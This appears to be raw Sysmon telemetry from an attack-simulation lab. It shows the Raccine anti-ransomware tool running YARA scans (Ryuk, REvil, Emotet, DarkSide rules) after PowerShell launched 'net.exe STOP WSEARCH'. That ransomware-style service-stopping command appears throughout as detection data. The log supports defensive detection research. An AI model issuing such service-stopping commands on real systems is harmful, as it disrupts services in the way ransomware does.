Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmpMD5=4708311A8B9ACD3CFC9475922E233332,SHA256=0DC7E591BF694FB2C7DFA9D8F3C8D08FD25017EBCC0C4229D84C59C894B95564,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244992Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.936{9DBE88B5-5532-61B2-BF08-010000000E02}26884576C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244989Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.923{9DBE88B5-5532-61B2-C008-010000000E02}24245292C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-BF08-010000000E02}2688C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244983Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.912{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-BF08-010000000E02}2688C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244982Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.912{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-BF08-010000000E02}2688C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244981Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.912{9DBE88B5-5532-61B2-BF08-010000000E02}2688C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244978Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.896{9DBE88B5-5532-61B2-BE08-010000000E02}6726768C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-BD08-010000000E02}8004C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244972Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.885{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-BD08-010000000E02}8004C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244971Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.884{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-BD08-010000000E02}8004C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244970Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.884{9DBE88B5-5532-61B2-BD08-010000000E02}8004C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244967Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.869{9DBE88B5-5532-61B2-BC08-010000000E02}60763468C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-BB08-010000000E02}2604C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244960Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.856{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-BB08-010000000E02}2604C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244959Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.856{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-BB08-010000000E02}2604C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244958Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.857{9DBE88B5-5532-61B2-BB08-010000000E02}2604C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244955Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.841{9DBE88B5-5532-61B2-BA08-010000000E02}81607820C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-B908-010000000E02}6108C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244949Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.830{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-B908-010000000E02}6108C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244948Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.830{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-B908-010000000E02}6108C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244947Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.830{9DBE88B5-5532-61B2-B908-010000000E02}6108C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244944Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.814{9DBE88B5-5532-61B2-B808-010000000E02}17924676C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-B708-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244938Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.802{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-B708-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244937Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.802{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-B708-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244936Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.802{9DBE88B5-5532-61B2-B708-010000000E02}208C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244933Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.786{9DBE88B5-5532-61B2-B608-010000000E02}19647336C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-B508-010000000E02}4348C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244927Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.775{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-B508-010000000E02}4348C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244926Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.774{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-B508-010000000E02}4348C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244925Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.775{9DBE88B5-5532-61B2-B508-010000000E02}4348C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244922Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.759{9DBE88B5-5532-61B2-B408-010000000E02}73561132C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-B308-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244916Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.748{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-B308-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244915Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.747{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-B308-010000000E02}7840C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244914Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.748{9DBE88B5-5532-61B2-B308-010000000E02}7840C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244911Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.732{9DBE88B5-5532-61B2-B208-010000000E02}77605636C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-B108-010000000E02}348C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244904Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.719{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-B108-010000000E02}348C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244903Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.719{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-B108-010000000E02}348C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244902Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.719{9DBE88B5-5532-61B2-B108-010000000E02}348C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244898Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.701{9DBE88B5-5532-61B2-B008-010000000E02}61727952C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-AF08-010000000E02}6060C:\Program 